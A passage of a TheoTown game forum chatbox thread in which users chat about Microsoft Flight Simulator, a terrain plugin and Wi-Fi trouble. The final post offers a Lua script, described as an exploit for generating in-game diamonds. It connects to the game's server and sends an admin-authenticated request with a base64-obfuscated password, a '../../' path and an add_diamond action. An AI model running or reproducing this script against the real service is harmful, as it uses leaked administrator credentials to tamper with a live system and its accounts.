I wish it's possible to add your own influence in your plugins
Re: TheoTown Forum Chatbox
Posted: 19 Aug 2020, 17:49
by Uncle Koala
Anyone here seen the new Microsoft Flight Simulator? It looks amazing. I saw a video of someone intentionally slowing their internet down to see how 2D Satelitte images turn into full 3D cities. Truly next gen.
Re: TheoTown Forum Chatbox
Posted: 19 Aug 2020, 18:04
by CommanderABab
I watched a video of someone doing the challenge of landing a plane on a runway half the length recommended for the plane.
Re: TheoTown Forum Chatbox
Posted: 20 Aug 2020, 00:17
by Kamikazi
MFS 2020 is just straight up astonishing. I saw 2 joke-ish videos about it and 2 videos of raw gameplay footage. It really looks realistic. I'm also impressed with the default planes
Re: TheoTown Forum Chatbox
Posted: 20 Aug 2020, 19:41
by Uncle Koala
Lobby in 2018 wrote:
Yeah, it's a cool building. I'm afraid there could be complains if I re-add it into the game natively, as it would mean that we have more buildings of a specific religion. I often get requests to add buildings of various religions...
To people who read crash reports: Sorry for those stack overflows, won't happen again!
Anyways, I made AMAZING progress on my Terrain Tools plugin.
Replacing all ground with sand on a giant map took almost 2 hours. Now? It's 5 seconds. 5 SECONDS! And it affects no other scripts at all! Nothing runs until you make it run! This means I can add all kinds of scripts now and the impact will be minimal.
Sorry for the night mode. If you zoom in, you will see that it's not snow, it's sand!
Re: TheoTown Forum Chatbox
Posted: 22 Aug 2020, 23:19
by RayXP
Anyone know how to fix this? My xbox disconnects from my wifi like every 5 minutes, and it's really annoying...
Re: TheoTown Forum Chatbox
Posted: 25 Aug 2020, 00:37
by JustAnyone
Found a cheesy exploit which you can use to generate diamonds. Either that or it's somehow broken, idk.
Unfortunately, it's limited for 1 diamond per http request
local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
function dec(data)
data = string.gsub(data, '[^'..b..'=]', '')
return (data:gsub('.', function(x)
if (x == '=') then return '' end
local r,f='',(b:find(x)-1)
for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end
return r;
end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
if (#x ~= 8) then return '' end
local c=0
for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end
return string.char(c)
end))
end
local LuaSocket = require("socket")
client = LuaSocket.connect("ja.theotown.com", 80)
client:send("GET ../../api/public/diamond_req.php?login=admin&pass="..dec('NDJkU2FYcGVyaWE=').."&action=add_diamond¶m1=1&user=<your_forum_user_id> HTTP/1.0\r\nHost: ja.theotown.com\r\n\r\n")
while true do
s, status, partial = client:receive('*a')
print(s or partial)
if status == "closed" then
break
end
end
client:close()